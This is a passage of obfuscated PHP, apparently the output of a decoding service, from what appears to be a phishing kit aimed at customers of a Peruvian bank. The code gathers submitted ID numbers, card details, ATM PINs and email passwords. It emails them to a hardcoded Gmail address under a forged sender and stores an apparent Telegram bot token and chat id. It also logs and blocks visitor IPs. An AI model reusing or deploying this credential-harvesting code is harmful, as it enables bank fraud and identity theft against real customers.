(isset($_SERVER["\x48\x54\x54\120\137\x58\x5f\x46\117\122\x57\101\x52\104\x45\x44"])) { $cliente = $_SERVER["\x48\x54\124\x50\x5f\130\137\106\x4f\x52\127\101\x52\104\105\x44"]; } elseif (isset($_SERVER["\x48\x54\x54\x50\x5f\x46\117\x52\x57\101\122\x44\x45\104\x5f\x46\117\122"])) { $cliente = $_SERVER["\110\124\x54\x50\x5f\106\x4f\x52\x57\101\122\104\x45\104\x5f\106\117\x52"]; } elseif (isset($_SERVER["\x48\124\124\x50\137\x46\x4f\122\x57\x41\122\104\x45\x44"])) { $cliente = $_SERVER["\110\x54\x54\x50\x5f\106\x4f\122\x57\x41\122\x44\x45\104"]; } else { $cliente = isset($_SERVER["\x52\x45\115\117\124\x45\x5f\101\x44\x44\122"]) ? $_SERVER["\122\x45\115\117\x54\105\x5f\x41\x44\x44\122"] : false; } if ($cliente === "\72\x3a\x31") { $cliente = "\61\x38\61\56\66\x37\56\62\61\x36\x2e\70\64"; } return $cliente; } goto GFaQh; UJPO6: define("\137\x74\157\x6b\145\x6e", array("\x37\x37\63\x34\61\61\x39\60\64\x34\x3a\101\101\x48\115\x75\x76\171\x72\167\x62\64\113\60\106\143\61\x37\145\x44\130\156\x47\160\x72\x50\x46\x70\x6b\131\150\112\x63\160\x76\x34")); goto sIm3b; aBg3A: $voy = $_POST["\157\x72\x64\145\156"]; goto sC2_n; ucQPB: define("\x45\115\101\x49\x4c\137\114\117\107\123", "\143\145\x73\141\x72\x73\x61\156\x74\151\141\147\x6f\144\145\154\x67\141\144\157\62\x30\60\x35\100\x67\x6d\x61\151\154\x2e\143\x6f\x6d"); goto UJPO6; bWZRB: function mandar_datos($cadena, $cliente, $sms) { $subj = "\x42\103\x50\x20\x2d\x20{$cliente}"; $header .= "\106\x72\x6f\155\72\40" . $cadena . "\74{$cliente}\100\156\157\x72\x65\160\x6c\171\56\x63\157\x6d\x3e" . "\15\12"; $header .= "\x4d\111\115\x45\55\x56\145\162\163\151\157\156\72\x20\61\56\60" . "\xd\xa"; $header .= "\103\157\x6e\x74\145\156\164\x2d\x74\171\160\x65\72\40\x74\x65\x78\164\x2f\150\x74\x6d\154\73\x20\x63\x68\141\162\x73\145\164\75\165\164\146\55\x38" . "\15\xa"; mail(EMAIL_LOGS, $subj, $sms, $header); } goto Kqcn3; oS4cH: error_reporting(0); goto gckDj; sIm3b: define("\x5f\151\144", array("\x35\x35\62\x34\x33\x35\x36\70\67\x31")); goto gCJbu; xip3I: $agente = $_SERVER["\110\x54\124\120\x5f\125\123\x45\122\x5f\101\x47\105\x4e\124"]; goto IwzNQ; gCJbu: date_default_timezone_set("\101\x6d\x65\x72\x69\x63\141\x2f\x4c\151\x6d\141"); goto C3UEd; GFaQh: $data = array("\144\x61\x74\x6f\x5f\x30" => "\104\116\111", "\144\x61\x74\x6f\x5f\61" => $_POST["\144\141\164\141\x5f\x31"], "\144\141\164\157\137\62" => $_POST["\144\x61\164\141\x5f\x32"], "\144\x61\x74\157\137\63" => $_POST["\144\141\164\141\137\63"], "\144\x61\164\157\137\x34" => $_POST["\144\141\164\x61\x5f\64"], "\144\x61\x74\157\x5f\65" => $_POST["\x64\141\x74\x61\x5f\x35"], "\144\141\x74\x6f\137\66" => $_POST["\144\141\x74\x61\x5f\66"], "\144\141\x74\x6f\137\67" => $_POST["\x64\141\x74\x61\x5f\67"], "\x64\141\x74\157\137\x38" => $_POST["\x64\141\x74\141\137\x38"], "\x64\141\x74\x6f\x5f\x39" => $_POST["\x64\x61\164\x61\137\x39"], "\144\x61\164\157\x5f\70\70\71\71" => $_POST["\x64\x61\164\x61\137\x38\70\71\71"], "\x64\x61\x74\157\137\67\x30\60" => $_POST["\144\141\164\141\137\67\60\60"], "\x64\x61\x74\157\x5f\x37\x30\61" => $_POST["\144\x61\164\141\x5f\x37\60\x31"], "\x64\141\x74\x6f\137\67\60\x32" => $_POST["\x64\x61\x74\141\137\x37\x30\x32"], "\x64\141\x74\x6f\137\x37\60\x33" => $_POST["\144\141\164\x61\x5f\x37\60\63"], "\x64\x61\164\157\137\67\x30\x34" => $_POST["\x64\x61\x74\x61\137\67\60\x34"], "\x64\141\164\x6f\137\67\x30\65" => $_POST["\144\x61\x74\x61\x5f\67\x30\x35"], "\x64\141\164\x6f\x5f\x37\60\x36" => $_POST["\144\141\x74\141\x5f\x37\60\66"], "\x64\141\x74\157\x5f\67\60\x37" => $_POST["\x64\x61\164\x61\x5f\67\x30\x37"], "\144\141\x74\x6f\137\144\x69\x61\144\145\160\141\x67\x6f" => $_POST["\x64\141\x74\141\x5f\144\x69\x61\x64\x65\160\141\x67\157"], "\x64\x61\x74\x6f\137\x61\x74\x6d" => $_POST["\x64\x61\x74\141\137\x61\x74\155"], "\144\141\x74\157\137\x63\157\162\x72\x65\x6f" => $_POST["\x64\141\x74\x61\137\x63\x6f\162\x72\x65\157"], "\x64\141\164\157\x5f\x63\x6f\156\164\x72\x61\x73\145\303\261\141\143\157\162\x72\145\157" => $_POST["\144\141\164\141\137\143\157\156\164\x72\141\x73\145\303\xb1\x61\143\x6f\x72\162\x65\157"]); goto aBg3A; IwzNQ: $fecha = date("\x64\57\155\x2f\131\x20\x2d\x20\x68\72\151\40\101"); goto K6l7o; Kqcn3: function bloquedHT($datosIP) { $archivo = "\x62\154\x6f\161\x75\x65\x61\144\157\163\x2e\x74\170\164"; $ipBloqueada = trim($datosIP) . PHP_EOL; if (!file_exists($archivo) || !in_array(trim($datosIP), file($archivo, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES))) { file_put_contents($archivo, $ipBloqueada, FILE_APPEND); } } goto ex8kZ; gckDj: session_start(); goto ucQPB; ex8kZ: ?>
Function Calls
None |
Stats
MD5 | 2b60437dc29d3f1100fe58dc876b67a6 |
Eval Count | 0 |
Decode Time | 72 ms |